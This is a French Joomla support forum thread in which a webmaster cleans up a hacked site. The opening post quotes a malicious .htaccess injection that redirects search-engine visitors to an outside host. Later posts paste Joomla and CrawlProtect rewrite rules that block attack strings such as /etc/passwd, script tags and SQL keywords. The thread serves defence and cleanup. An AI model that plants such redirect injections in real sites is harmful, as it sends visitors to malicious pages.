comment nettoyer mon site piraté ou infecté

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • comment nettoyer mon site piraté ou infecté

    Bonjour
    J'ai deux sites qui semble piratés

    www.labtec-sn.com (mis hors ligne)
    j'ai téléchargé tous les fichier sur mon ordi et lancer des analyses avec avec AVIRA,superantiwpyware,spybot SDet MAM
    comment faire pour que tout redevienne normal?


    Pour osad-sn.com le fichier htacess contient
    Code:
    #c3284d#
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|
    aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|
    clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|
    findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|
    hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|
    lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|
    ase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
    RewriteRule ^(.*)$ hxxp://methuenedge.com/stats.php [R=301,L]
    </IfModule>
    #/c3284d#
    Dernière édition par zepelin57 à 16/08/2012, 00h19

  • #2
    Re : comment nettoyer mon site piraté ou infecté

    Bonjour,

    Toutes les méthodes de nettoyage et sécurisation de sites sont données dans les sujets importants de ce forum http://forum.joomla.fr/forumdisplay....%A9curit%C3%A9 bien que destiné à 1.5, ça reste valide en méthodologie.
    Dans le cas présent, il s'agit d'une infection par injection .htaccess
    Pas de demande de support par MP.
    S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

    Commentaire


    • #3
      Re : comment nettoyer mon site piraté ou infecté

      merci je vais regarder tout ça

      Commentaire


      • #4
        Re : comment nettoyer mon site piraté ou infecté

        jisse03 j'ai installé le fichier htaccess (je n'ai rien modifié)proposé dans le lien et maintenant j'ai le message The server encountered an internal error or misconfiguration and was unable to complete your request.

        Please contact the server administrator, postmaster@www.osad-sn.com and inform them of the time the error occurred, and anything you might have done that may have caused the error.

        More information about this error may be available in the server error log.

        ci dessous lmon fichier index.php
        Code:
        <?php
        /**
         * @version		$Id: index.php 20806 2011-02-21 19:44:59Z dextercowley $
         * @package		Joomla.Site
         * @copyright	Copyright (C) 2005 - 2011 Open Source Matters, Inc. All rights reserved.
         * @license		GNU General Public License version 2 or later; see LICENSE.txt
         */
        
        // Set flag that this is a parent file.
        define('_JEXEC', 1);
        define('DS', DIRECTORY_SEPARATOR);
        
        if (file_exists(dirname(__FILE__) . '/defines.php')) {
        	include_once dirname(__FILE__) . '/defines.php';
        }
        
        if (!defined('_JDEFINES')) {
        	define('JPATH_BASE', dirname(__FILE__));
        	require_once JPATH_BASE.'/includes/defines.php';
        }
        
        require_once JPATH_BASE.'/includes/framework.php';
        
        // Mark afterLoad in the profiler.
        JDEBUG ? $_PROFILER->mark('afterLoad') : null;
        
        // Instantiate the application.
        $app = JFactory::getApplication('site');
        
        // Initialise the application.
        $app->initialise();
        
        // Mark afterIntialise in the profiler.
        JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
        
        // Route the application.
        $app->route();
        
        // Mark afterRoute in the profiler.
        JDEBUG ? $_PROFILER->mark('afterRoute') : null;
        
        // Dispatch the application.
        $app->dispatch();
        
        // Mark afterDispatch in the profiler.
        JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
        
        // Render the application.
        $app->render();
        
        // Mark afterRender in the profiler.
        JDEBUG ? $_PROFILER->mark('afterRender') : null;
        
        // Return the response.
        echo $app;
        Dernière édition par zepelin57 à 16/08/2012, 00h18

        Commentaire


        • #5
          Re : comment nettoyer mon site piraté ou infecté

          l'erreur 500 est causée par ton HTACCESS...
          1 : Consulte les LOGS FTP pour voir si une autre ip que la tienne a eu accès au FTP
          2 : Consulte les LOGS WEB et cherches une fonction POST suspecte
          3 : Remet le HTACCESS d'origine de JOOMLA (si tu l'a plus telecharge le pack joomla il sera dedans)
          4 : Install proprement CRAWLPROTECT dans ton dossier www (ne pas passer par joomla) il va te mettre un HTACCESS en béton sans toucher à celui de joomla
          5 : Connecte toi sur CRAWLPROTECT quelques heures après l'install et regarde quel genre d'attaques ont eu lieu (XSS, BadBot, Injection SQL,...) S'il s'agit d'attaques XSS (cross site scripting) regarde dans ladresse incriminée quel composant de joomla est utilisé par les hackers (com_xxx) et désactives le dans gestion des extensions pour bloquer la faille.

          Commentaire


          • #6
            Re : comment nettoyer mon site piraté ou infecté

            Envoyé par coco13 Voir le message
            l'erreur 500 est causée par ton HTACCESS...
            1 : Consulte les LOGS FTP pour voir si une autre ip que la tienne a eu accès au FTP
            2 : Consulte les LOGS WEB et cherches une fonction POST suspecte
            3 : Remet le HTACCESS d'origine de JOOMLA (si tu l'a plus telecharge le pack joomla il sera dedans)
            4 : Install proprement CRAWLPROTECT dans ton dossier www (ne pas passer par joomla) il va te mettre un HTACCESS en béton sans toucher à celui de joomla
            5 : Connecte toi sur CRAWLPROTECT quelques heures après l'install et regarde quel genre d'attaques ont eu lieu (XSS, BadBot, Injection SQL,...) S'il s'agit d'attaques XSS (cross site scripting) regarde dans ladresse incriminée quel composant de joomla est utilisé par les hackers (com_xxx) et désactives le dans gestion des extensions pour bloquer la faille.
            Merci je viens d'installer crawlprotect. et j'ai généré le htacess. Mais dans mon répertoire www je ne vois que le htacess d'origine et mon site affiche toujours Parse error: syntax error, unexpected T_CLASS in /homez.25/osadsn/www/includes/version.php on line 17

            Commentaire


            • #7
              Re : comment nettoyer mon site piraté ou infecté

              Bonjour,
              Parse error: syntax error, unexpected T_CLASS in /homez.25/osadsn/www/includes/version.php on line 17
              Ce fichier n'est pas un fichier de Joomla! 2.5.
              Il y a fort à parier qu'un antique composant; module, plugin ou template pour Joomla! 1.0 (seul à avoir version en /includes) soit présent dans le système.
              Pas de demande de support par MP.
              S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

              Commentaire


              • #8
                Re : comment nettoyer mon site piraté ou infecté

                Envoyé par jisse03 Voir le message
                Bonjour,

                Ce fichier n'est pas un fichier de Joomla! 2.5.
                Il y a fort à parier qu'un antique composant; module, plugin ou template pour Joomla! 1.0 (seul à avoir version en /includes) soit présent dans le système.
                noter que j'ai installer crawlprotect et ai corriger l'erreur en applicant ce qui est sur le lien suivant

                référencement et référencement efficace,blog du référencement et de la création de sites,actualités du Net et Liens utiles,le net pour les nuls,google,yahoo,bing et les moteurs de recherche,aide pour les webmasters,chambres d'hôtes et créations numériques


                je veux maintenant vérifier que mon site ne dépose pas de code malveillant.
                Ce qui m'étonne c'est que le HTACESS d'origine de joomla se trouve dans la racine www et celui de crawlprotect se trouve dans les dossiers de crawlprotect??
                Merci

                Commentaire


                • #9
                  Re : comment nettoyer mon site piraté ou infecté

                  CrawlProtect vient normalement modifier le .htaccess du site, en y insérant en en-tête ses propres éléments de protection. Si celui du site n'a pas été généré, il y a une erreur.
                  Pas de demande de support par MP.
                  S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                  Commentaire


                  • #10
                    Re : comment nettoyer mon site piraté ou infecté

                    bon apparemment c'est ok.ci dessous le contenu du htacess de ma racine de site(www)
                    Code:
                    ##
                    # @version		$Id: htaccess.txt 21101 2011-04-07 15:47:33Z dextercowley $
                    # @package		Joomla
                    # @copyright	Copyright (C) 2005 - 2011 Open Source Matters. All rights reserved.
                    # @license		GNU General Public License version 2 or later; see LICENSE.txt
                    
                    ##
                    [COLOR="#FF0000"]AddType x-mapp-php5 .php [/COLOR][COLOR="#008000"]ce que j'ai ajouté[/COLOR]
                    # READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE!
                    #
                    # The line just below this section: 'Options +FollowSymLinks' may cause problems
                    # with some server configurations.  It is required for use of mod_rewrite, but may already
                    # be set by your server administrator in a way that dissallows changing it in
                    # your .htaccess file.  If using it causes your server to error out, comment it out (add # to
                    # beginning of line), reload your site in your browser and test your sef url's.  If they work,
                    # it has been set by your server administrator and you do not need it set here.
                    ##
                    
                    ## Can be commented out if causes errors, see notes above.
                    Options +FollowSymLinks
                    
                    ## Mod_rewrite in use.
                    
                    RewriteEngine On
                    
                    ## Begin - Rewrite rules to block out some common exploits.
                    # If you experience problems on your site block out the operations listed below
                    # This attempts to block the most common type of exploit `attempts` to Joomla!
                    #
                    # Block out any script trying to base64_encode data within the URL.
                    RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
                    # Block out any script that includes a <script> tag in URL.
                    RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
                    # Block out any script trying to set a PHP GLOBALS variable via URL.
                    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
                    # Block out any script trying to modify a _REQUEST variable via URL.
                    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
                    # Return 403 Forbidden header and show the content of the root homepage
                    RewriteRule .* index.php [F]
                    #
                    ## End - Rewrite rules to block out some common exploits.
                    
                    ## Begin - Custom redirects
                    #
                    # If you need to redirect some pages, or set a canonical non-www to
                    # www redirect (or vice versa), place that code here. Ensure those
                    # redirects use the correct RewriteRule syntax and the [R=301,L] flags.
                    #
                    ## End - Custom redirects
                    
                    ##
                    # Uncomment following line if your webserver's URL
                    # is not directly related to physical file paths.
                    # Update Your Joomla! Directory (just / for root).
                    ##
                    
                    # RewriteBase /
                    
                    ## Begin - Joomla! core SEF Section.
                    #
                    RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
                    #
                    # If the requested path and file is not /index.php and the request
                    # has not already been internally rewritten to the index.php script
                    RewriteCond %{REQUEST_URI} !^/index\.php
                    # and the request is for something within the component folder,
                    # or for the site root, or for an extensionless URL, or the
                    # requested URL ends with one of the listed extensions
                    RewriteCond %{REQUEST_URI} /component/|(/[^.]*|\.(php|html?|feed|pdf|vcf|raw))$ [NC]
                    # and the requested path and file doesn't directly match a physical file
                    RewriteCond %{REQUEST_FILENAME} !-f
                    # and the requested path and file doesn't directly match a physical folder
                    RewriteCond %{REQUEST_FILENAME} !-d
                    # internally rewrite the request to the index.php script
                    RewriteRule .* index.php [L]
                    #
                    ## End - Joomla! core SEF Section.
                    Dernière édition par zepelin57 à 16/08/2012, 00h18

                    Commentaire


                    • #11
                      Re : comment nettoyer mon site piraté ou infecté

                      Je n'y vois pas les inserts CrawlProtect...
                      Donc le site n'est pas protégé par CrawlProtect.

                      Sur le site CrawlProtect, il y a une documentation complète et en français que tu n'as certainement pas lue...
                      Première chose, lire la documentation de CrawlProtect et l'appliquer scrupuleusement.
                      Pas de demande de support par MP.
                      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                      Commentaire


                      • #12
                        Re : comment nettoyer mon site piraté ou infecté

                        Envoyé par jisse03 Voir le message
                        Je n'y vois pas les inserts CrawlProtect...
                        Donc le site n'est pas protégé par CrawlProtect.

                        Sur le site CrawlProtect, il y a une documentation complète et en français que tu n'as certainement pas lue...
                        Première chose, lire la documentation de CrawlProtect et l'appliquer scrupuleusement.
                        s'il s'agit de cette documentation je l'ai lu. ttp://www.crawltrack.fr/crawlprotect/documentation.php
                        après l'installation ce qui m'a un peu étonné c'est que lorsque je tape ww.osad-sn.com/crawlprotect ça maffiche une arborescence et quand ke clique sur le dossier de crawlprotect là seulement l'écran pour se logger s'affiche.et pourtant j'ai bien généré le fichier htacess et fait toute la marche à suivre
                        Dernière édition par zey15 à 02/08/2012, 22h08

                        Commentaire


                        • #13
                          Re : comment nettoyer mon site piraté ou infecté

                          Quelqu'un peut-il m'aider à bien installer crawlprotect dans ce cas pour que j'assainisse le site définitivement SVP?

                          Commentaire


                          • #14
                            Re : comment nettoyer mon site piraté ou infecté

                            Bonjour,

                            C'est indiqué dans la doc de CrawlProtect. Si le fichier .htaccess du site n'a pu être écrit, il y a moyen de copier le contenu proposé par CrawlProtect directement dans un fichier .htaccess à mettre pour remplacer celui du site.

                            Toujours bien lire les docs et l'aide en ligne de ce type de produit.
                            Pas de demande de support par MP.
                            S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

                            Commentaire


                            • #15
                              Re : comment nettoyer mon site piraté ou infecté

                              Le contenu de mon htacess.(je n'ai pas tout poasté car trop long.
                              Mais je crois que maintenant c'est bon
                              Code:
                              #----------------------------------------------------------------------
                              # Htaccess created by CrawlProtect
                              #----------------------------------------------------------------------
                              # Protect you website from hackers
                              #----------------------------------------------------------------------
                              # Author: Jean-Denis Brun
                              #----------------------------------------------------------------------
                              # Website: [url]www.crawltrack.net/crawlprotect[/url]
                              #----------------------------------------------------------------------
                              # That file is distributed under GNU GPL license
                              #----------------------------------------------------------------------
                              # Htaccess created on: Monday 13th of August 2012 11:10:54 PM
                              #----------------------------------------------------------------------
                              #----------------------------------------------------------------------
                              #----------------------------------------------------------------------
                              <IfModule mod_rewrite.c>
                              RewriteEngine On
                              #----------------------------------------------------------------------
                              #xss blocage
                              #----------------------------------------------------------------------
                              RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
                              #-----------------Avoid issue with scripts used--------------------
                              #CrawlTrack
                              RewriteCond %{REQUEST_URI} !^(.*)countdownload(.*)$ [NC]
                              #CrawlTrack
                              RewriteCond %{REQUEST_URI} !^(.*)keywordposition\.php(.*)$ [NC]
                              #CrawlTrack
                              RewriteCond %{QUERY_STRING} !^(.*)navig=(.*)period=(.*)site=(.*)crawler=(.*)graphpos=(.*)$ [NC]
                              #----------------------------------------------------------------------
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)(t|%74|%54)(p|%70|%50)(s|%73|%53)(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)(t|%74|%54)(p|%70|%50)(s|%73|%53)%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)(t|%74|%54)(p|%70|%50)(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)(t|%74|%54)(p|%70|%50)%3a(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(f|%66|%46)(t|%74|%54)(p|%70|%50)(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)%20(t|%74|%54)(p|%70|%50)(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)(t|%74|%54)%20(p|%70|%50)(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)(t|%74|%54)(t|%74|%54)(p|%70|%50)%20(%3A|:)(/|%2F){2}(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=|%3A|%09)(.*)(h|%68|%48)%20(t|%74|%54)(t|%74|%54)(p|%70|%50)(%3A|:)(/|%2F){2}(.*)$ [NC]
                              RewriteRule (.*) http://www.osad-sn.com/crawlprotect/crawlprotect/noaccess/index.php?crawlprotectsite=1&crawlprotecttype=xss&crawlprotecturl=%{REQUEST_URI}&crawlprotect2content   [L,QSA]
                              #----------------------------------------------------------------------
                              #Sql injection blocage
                              #----------------------------------------------------------------------
                              RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
                              RewriteCond %{QUERY_STRING} ^(.*)(%20(S|%73|%53)(E|%65|%45)(L|%6C|%4C)(E|%65|%45)(C|%63|%43)(T|%74|%54)%20|%20(I|%69|%49)(N|%6E|%4E)(S|%73|%53)(E|%65|%45)(R|%72|%52)(T|%74|%54)%20|%20(U|%75|%55)(P|%70|%50)(D|%64|%44)(A|%61|%41)(T|%74|%54)(E|%65|%45)%20|%20(R|%72|%52)(E|%65|%45)(P|%70|%50)(L|%6C|%4C)(A|%61|%41)(C|%63|%43)(E|%65|%45)%20|%20(W|%77|%57)(H|%68|%48)(E|%65|%45)(R|%72|%52)(E|%65|%45)%20|%20(L|%6C|%4C)(I|%69|%49)(K|%6B|%4B)(E|%65|%45)%20|%20(O|%6F|%4F)(R|%72|%52)%20)(.*)$ [NC]
                              RewriteRule (.*) http://www.osad-sn.com/crawlprotect/crawlprotect/noaccess/index.php?crawlprotectsite=1&crawlprotecttype=sqlinjection&crawlprotecturl=%{REQUEST_URI}&crawlprotect2content   [L,QSA]
                              #----------------------------------------------------------------------
                              #Code injection blocage
                              #----------------------------------------------------------------------
                              RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3C|<)/?(s|%73|%53)(c|%63|%43)(r|%72|%52)(i|%69|%49)(p|%70|%50)(t|%74|%54)(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(%3D|=)?(j|%6A|%4A)(a|%61|%41)(v|%76|%56)(a|%61|%31)(s|%73|%53)(c|%63|%43)(r|%72|%52)(i|%69|%49)(p|%70|%50)(t|%74|%54)(%3A|:)(.*)$ [NC,OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(d|%64|%44)(o|%6F|%4F)(c|%63|%43)(u|%75|%55)(m|%6D|%4D)(e|%65|%45)(n|%6E|%4E)(t|%74|%54)\.(l|%6C|%4C)(o|%6F|%4F)(c|%63|%43)(a|%61|%41)(t|%74|%54)(i|%69|%49)(o|%6F|%4F)(n|%6E|%4E)\.(h|%68|%48)(r|%72|%52)(e|%65|%45)(f|%66|%46)(.*)$ [OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(b|%62|%42)(a|%61|%41)(s|%73|%53)(e|%65|%45)(6|%36)(4|%34)(_|%5F)(e|%65|%45)(n|%6E|%4E)(c|%63|%43)(o|%6F|%4F)(d|%64|%44)(e|%65|%45)(.*)$ [OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(G|%67|%47)(L|%6C|%4C)(O|%6F|%4F)(B|%62|%42)(A|%61|%41)(L|%6C|%4C)(S|%73|%53)(=|[|%[0-9A-Z]{0,2})(.*)$ [OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(_|%5F)(R|%72|%52)(E|%65|%45)(Q|%71|%51)(U|%75|%55)(E|%65|%45)(S|%73|%53)(T|%74|%54)(=|[|%[0-9A-Z]{0,2})(.*)$ [OR]
                              RewriteCond %{REQUEST_URI} ^(.*)(_|%5F)(v|%76|%56)(t|%74|%54)(i|%69|%49)(.*)$ [OR]
                              RewriteCond %{REQUEST_URI} ^(.*)(M|%4D)(S|%53)(O|%4F)(f|%66)(f|%66)(i|%69)(c|%63)(e|%65)(.*)$ [OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(/|%2F)(e|%65)(t|%74)(c|%63)(/|%2F)(p|%70)(a|%61)(s|%73)(s|%73)(w|%77)(d|%64)(.*)$ [OR]
                              RewriteCond %{REQUEST_URI} ^(.*)(S|%53)(h|%68)(e|%65)(l|%6C)(l|%6C)(A|%41)(d|%64)(r|%72)(e|%65)(s|%73)(i|%69).(T|%54)(X|%58)(T|%54)(.*)$ [OR]
                              RewriteCond %{REQUEST_URI} ^(.*)\[(e|%65)(v|%76)(i|%69)(l|%6C)(_|%5F)(r|%72)(o|%6F)(o|%6F)(t|%74)\]?(.*)$ [OR]
                              RewriteCond %{QUERY_STRING} ^(.*)\.\./\.\./\.\./(.*)$ [OR]
                              RewriteCond %{QUERY_STRING} ^(.*)(/|%2F)(p|%70)(r|%72)(o|%6F)(c|%63)(/|%2F)(s|%73)(e|%65)(l|%C)(f|%66)(/|%2F)(e|%65)(n|%6E)(v|%76)(i|%69)(r|%72)(o|%6F)(n|%6E)(.*)$
                              RewriteRule (.*) http://www.osad-sn.com/crawlprotect/crawlprotect/noaccess/index.php?crawlprotectsite=1&crawlprotecttype=codeinjection&crawlprotecturl=%{REQUEST_URI}&crawlprotect2content   [L,QSA]
                              #----------------------------------------------------------------------
                              #Bad bot and site copier blocage
                              #----------------------------------------------------------------------
                              RewriteCond %{HTTP_USER_AGENT} @nonymouse|ADSARobot|Advanced\ Email\ Extractor|ah-ha|aktuelles|almaden|amzn_assoc|Anarchie|Art-Online|AspiWeb|ASPSeek|ASSORT|ATHENS|Atomz|attach|attache|autoemailspider|BackWeb|Bandit|BatchFTP|bdfetch|big\.brother|BlackWidow|bmclient|Boston\ Project|Bot\ mailto:craftbot@yahoo\.com|BravoBrian\ SpiderEngine\ MarcoPolo|Buddy|Bullseye|bumblebee|capture|CherryPicker|ChinaClaw|CICC|clipping|Crescent\ Internet\ ToolPack|cURL|Custo|cyberalert|Deweb|diagem|Digger|Digimarc|DIIbot|DirectUpdate|DISCo|Drip|DSurf15a|DTS\.Agent|EasyDL|eCatch|echo\ extense|ecollector|efp@gmx\.net|EirGrabber|Email\ Extractor|EmailCollector|EmailSiphon|EmailWolf|Express\ WebPictures|ExtractorPro|EyeNetIE|fastlwspider|FavOrg|Favorites\ Sweeper|Fetch\ API\ Request|FEZhead|FileHound|FlashGet|FlickBot|fluffy|frontpage|GalaxyBot|Generic|Getleft|GetSmart|GetWeb!|GetWebPage|gigabaz|Girafabot|Go!Zilla|Go-Ahead-Got-It|GornKer|Grabber|GrabNet|Grafula|Green\ Research|Harvest|hhjhj@yahoo|hloader|HMView|HomePageSearch|HTTP\ agent|http\ generic|HTTPConnect|httpdown|HTTrack|IBM_Planetwide|Image\ Stripper|Image\ Sucker|imagefetch|IncyWincy|Indy\ Library|informant|Ingelin|InterGET|Internet\ Ninja|InternetLinkAgent|InternetSeer\.com|iOpus|IPiumBot\ laurion(dot)com|Iria|Irvine|Jakarta|JBH*Agent|JetCar|JustView|Kapere|KWebGet|Lachesis|larbin|LeechFTP|LexiBot|lftp|libwww|likse|Link*Sleuth|LINKS\ ARoMATIZED|LinkWalker|LWP|lwp-trivial|Mac\ Finder|Mag-Net|Magnet|Mass\ Downloader|MCspider|MemoWeb|Microsoft\ URL\ Control|MIDown\ tool|minibot\(NaverRobot\)|Missigua\ Locator|Mister\ PiX|MMMtoCrawl\/UrlDispatcherLLL|MSProxy|multithreaddb|nationaldirectory|Navroad|NearSite|Net\ Vampire|NetAnts|NetCarta|netcraft|netfactual|NetMechanic|netprospector|NetResearchServer|NetSpider|NetZIP|NEWT|nicerspro|NPBot|Octopus|Offline\ Explorer|Offline\ Navigator|OpaL|Openfind|OpenTextSiteCrawler|OutWit|PackRat|PageGrabber|Papa\ Foto|pavuk|pcBrowser|PersonaPilot|PingALink|Pockey|Program\ Shareware|psbot|PSurf|puf|Pump|PushSite|QRVA|QuepasaCreep|RealDownload|Reaper|Recorder|ReGet|replacer|RepoMonkey|Robozilla|Rover|RPT-HTTPClient|Rsync|SearchExpress|searchhippo|searchterms\.it|Second\ Street\ Research|Shai|sitecheck|SiteMapper|SiteSnagger|SlySearch|SmartDownload|snagger|SpaceBison|Spegla|SpiderBot|SqWorm|Star\ Downloader|Stripper|Sucker|SuperBot|SuperHTTP|Surfbot|SurfWalker|Szukacz|tAkeOut|tarspider|Teleport\ Pro|Telesoft|Templeton|traffixer|TrueRobot|TuringOS|TurnitinBot|TV33_Mercator|UIowaCrawler|URL_Spider_Pro|UtilMind|Vacuum|vagabondo|vayala|visibilitygap|vobsub|VoidEYE|vspider|w3mir|Web\ Data\ Extractor|Web\ Downloader|Web\ Image\ Collector|Web\ Sucker|web\.by\.mail|WebAuto|webbandit|Webclipping|webcollage|webcollector|WebCopier|webcraft@bea|WebDAV|webdevil|webdownloader|Webdup|WebEmailExtractor|WebFetch|WebGo\ IS|WebHook|Webinator|WebLeacher|WebMiner|WebMirror|webmole|WebReaper|WebSauger|WEBsaver|Website\ eXtractor|Website\ Quester|WebSnake|Webster|WebStripper|websucker|webvac|webwalk|webweasel|WebWhacker|WebZIP|Wget|whizbang|WhosTalking|Widow|WISEbot|WUMPUS|Wweb|WWWOFFLE|Wysigot|x-Tractor|Xaldon\ WebSpider|XGET|Zeus.*|^[^?]*\.ideography\.co\.uk|^[^?]*addresses\.com|^[^?]*iaea\.org [OR]
                              RewriteCond %{HTTP_REFERER} ^XXX
                              RewriteRule (.*) http://www.osad-sn.com/crawlprotect/crawlprotect/noaccess/index.php?crawlprotectsite=1&crawlprotecttype=badbot&crawlprotecturl=%{REQUEST_URI}&crawlprotect2content   [L,QSA]
                              Dernière édition par zepelin57 à 16/08/2012, 00h17

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X